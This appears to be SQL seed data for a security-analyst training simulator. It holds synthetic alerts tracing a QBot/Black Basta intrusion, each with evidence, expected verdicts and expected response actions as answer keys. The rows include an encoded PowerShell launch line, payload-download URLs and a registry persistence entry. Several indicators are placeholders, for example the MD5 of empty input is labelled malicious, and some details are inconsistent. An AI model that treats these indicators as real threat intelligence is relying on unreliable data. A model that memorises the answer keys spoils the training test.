(1537, 'Suspicious Email Detected with Malicious Attachment', 'high', 'Corporate Email Gateway Logs', 'An email was detected with a potentially malicious attachment that is suspected to be the initial vector for QBot deployment, commonly associated with Black Basta.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T09:23:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.15\",\"source_user\":\"jdoe@example.com\",\"destination_user\":\"support@target.com\",\"subject\":\"Important Update - Action Required\",\"attachment\":{\"filename\":\"Invoice_2023_10_12.xlsm\",\"file_hash\":\"d4c3b2a9745f2a89e7b5a1c3e4f9d4c7\",\"size\":124578},\"malware_family\":\"QBot\",\"threat_intel\":{\"related_ips\":[\"203.0.113.15\"],\"related_hashes\":[\"d4c3b2a9745f2a89e7b5a1c3e4f9d4c7\"],\"verdict\":\"malicious\"}}', '2026-03-15 19:11:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for QBot.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d4c3b2a9745f2a89e7b5a1c3e4f9d4c7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with QBot malware.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"jdoe@example.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Corporate Directory\",\"verdict\":\"internal\",\"details\":\"Internal user identified as potential victim.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Detected with Malicious Attachment\",\"date\":\"2026-03-15T20:58:15.416Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1538, 'QBot Malware Execution Identified', 'high', 'Endpoint Detection and Response (EDR) System', 'A QBot payload was executed on the victim\'s machine following a phishing email, establishing a foothold for further infiltration.', 'Malware Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"process_creation\",\"hostname\":\"victim-pc.local\",\"user\":\"j.doe\",\"process_name\":\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\qbot.exe\",\"process_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"source_ip\":\"10.0.0.23\",\"destination_ip\":\"89.123.45.67\",\"command_line\":\"\\\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\qbot.exe\\\" --silent\",\"parent_process\":\"explorer.exe\",\"parent_process_id\":1234,\"file_path\":\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\qbot.exe\",\"network_activity\":{\"outbound_connections\":[{\"remote_ip\":\"89.123.45.67\",\"remote_port\":443}]}}', '2026-03-15 19:11:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known QBot malware hash\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"89.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with QBot C2 servers\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\qbot.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"InternalAnalysis\",\"verdict\":\"suspicious\",\"details\":\"Filename pattern matches known QBot deployment\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalUserDatabase\",\"verdict\":\"internal\",\"details\":\"Employee user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1539, 'Persistence Mechanism Established via Registry Modification', 'high', 'Windows Registry Logs', 'Black Basta has modified the registry to establish persistence on the compromised system, indicating potential Conti heritage.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":4657,\"computer_name\":\"compromised-host.local\",\"user\":\"malicious_user\",\"registry_key_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\BlackBastaPersistence\",\"registry_value_name\":\"BlackBastaService\",\"registry_value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\\\"\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\reg.exe\",\"process_id\":1234,\"source_ip\":\"185.123.45.67\",\"internal_ip\":\"192.168.1.100\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:11:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Black Basta operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware samples.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used for unauthorized registry modifications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\BlackBastaPersistence\\\",\\\"registry_value_name\\\":\\\"BlackBastaService\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\\\\\"\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"process_id\\\":1234,\\\"source_ip\\\":\\\"185.123.45.67\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\BlackBastaPersistence\\\",\\\"registry_value_name\\\":\\\"BlackBastaService\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\\\\\"\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"process_id\\\":1234,\\\"source_ip\\\":\\\"185.123.45.67\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\BlackBastaPersistence\\\",\\\"registry_value_name\\\":\\\"BlackBastaService\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\\\\\"\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"process_id\\\":1234,\\\"source_ip\\\":\\\"185.123.45.67\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\BlackBastaPersistence\\\",\\\"registry_value_name\\\":\\\"BlackBastaService\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\\\\\"\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"process_id\\\":1234,\\\"source_ip\\\":\\\"185.123.45.67\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\BlackBastaPersistence\\\",\\\"registry_value_name\\\":\\\"BlackBastaService\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe -k netsvcs\\\\\\\"\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\reg.exe\\\",\\\"process_id\\\":1234,\\\"source_ip\\\":\\\"185.123.45.67\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1540, 'Lateral Movement Detected Across Network', 'high', 'Network Traffic Analysis', 'With persistence established, the attackers begin lateral movement using compromised credentials, spreading QBot to additional systems and escalating their control.', 'Lateral Movement', 'T1550 - Use Alternate Authentication Material', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:06:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"192.168.1.87\",\"external_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_filename\":\"qbot_payload.exe\",\"action\":\"lateral_movement\",\"protocol\":\"SMB\",\"description\":\"Detected lateral movement using compromised credentials to spread QBot malware.\"}', '2026-03-15 19:11:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.87\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of target host.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with QBot C2 server.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to QBot malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"qbot_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"malicious\",\"details\":\"Executable file associated with QBot malware.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory Logs\",\"verdict\":\"suspicious\",\"details\":\"User credentials suspected to be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1541, 'Sensitive Data Exfiltration Attempt', 'critical', 'Data Loss Prevention (DLP) System', 'An advanced persistent threat group, Black Basta, attempted to exfiltrate confidential data from the internal network as part of a double extortion scheme. The operation involved transferring sensitive files to an external server before encrypting the stolen data to demand a ransom.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:05:32Z\",\"event_id\":\"DLPEX123456\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jane.doe\",\"file_name\":\"confidential_report.docx\",\"hash\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"action\":\"exfiltration_attempt\",\"protocol\":\"FTP\",\"threat_actor\":\"Black Basta\"}', '2026-03-15 19:11:40', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal source IP address associated with the exfiltration attempt.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internet_reputation\",\"verdict\":\"malicious\",\"details\":\"External IP address linked to known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_dlp\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document targeted for exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"File hash associated with Black Basta malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_hr\",\"verdict\":\"clean\",\"details\":\"Valid user account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:05:32Z\\\",\\\"event_id\\\":\\\"DLPEX123456\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"file_name\\\":\\\"confidential_report.docx\\\",\\\"hash\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"threat_actor\\\":\\\"Black Basta\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:05:32Z\\\",\\\"event_id\\\":\\\"DLPEX123456\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"file_name\\\":\\\"confidential_report.docx\\\",\\\"hash\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"threat_actor\\\":\\\"Black Basta\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:05:32Z\\\",\\\"event_id\\\":\\\"DLPEX123456\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"file_name\\\":\\\"confidential_report.docx\\\",\\\"hash\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"threat_actor\\\":\\\"Black Basta\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:05:32Z\\\",\\\"event_id\\\":\\\"DLPEX123456\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"file_name\\\":\\\"confidential_report.docx\\\",\\\"hash\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"threat_actor\\\":\\\"Black Basta\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.437Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:05:32Z\\\",\\\"event_id\\\":\\\"DLPEX123456\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"file_name\\\":\\\"confidential_report.docx\\\",\\\"hash\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"action\\\":\\\"exfiltration_attempt\\\",\\\"protocol\\\":\\\"FTP\\\",\\\"threat_actor\\\":\\\"Black Basta\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1542, 'Suspicious Phishing Email Detected', 'high', 'Email Gateway Logs', 'A phishing email was detected targeting employees, attempting to gain entry to the network by tricking users into providing their credentials. The email contained a malicious link pointing to a credential harvesting site.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:00Z\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"192.168.1.25\",\"subject\":\"Urgent: Update Required\",\"from\":\"attacker@example.com\",\"to\":\"employee@company.com\",\"malicious_url\":\"http://malicious-site.com/login\",\"attachment\":{\"filename\":\"Security_Update.docx\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\"},\"user_agent\":\"Mozilla/5.0\",\"x_mailer\":\"PhishMailer v2.3\"}', '2026-03-15 19:12:00', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known phishing server\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"Credential harvesting site\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Low detection rate\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation\",\"verdict\":\"malicious\",\"details\":\"Associated with multiple phishing campaigns\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Phishing Email Detected\",\"date\":\"2026-03-15T20:58:15.440Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1543, 'Malicious Macro Execution', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the attachment in the phishing email, a macro is executed, serving as the initial payload to establish a foothold within the system. The macro downloaded additional malicious payloads that attempt to communicate with a known malicious IP.', 'Execution', 'T1059.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:11Z\",\"event_id\":\"EXE12345\",\"username\":\"jdoe\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.45\",\"file_name\":\"invoice_macro_v2.docm\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_name\":\"WINWORD.EXE\",\"command_line\":\"WINWORD.EXE /m invoice_macro_v2.docm\",\"malware_family\":\"Emotet\",\"malicious_url\":\"http://malicious-downloads.com/payload\",\"detected_by\":\"EDR\"}', '2026-03-15 19:12:00', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for Emotet.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"invoice_macro_v2.docm\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File contains macro code commonly used in Emotet campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known Emotet macro payload.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-downloads.com/payload\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"URL associated with malware distribution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
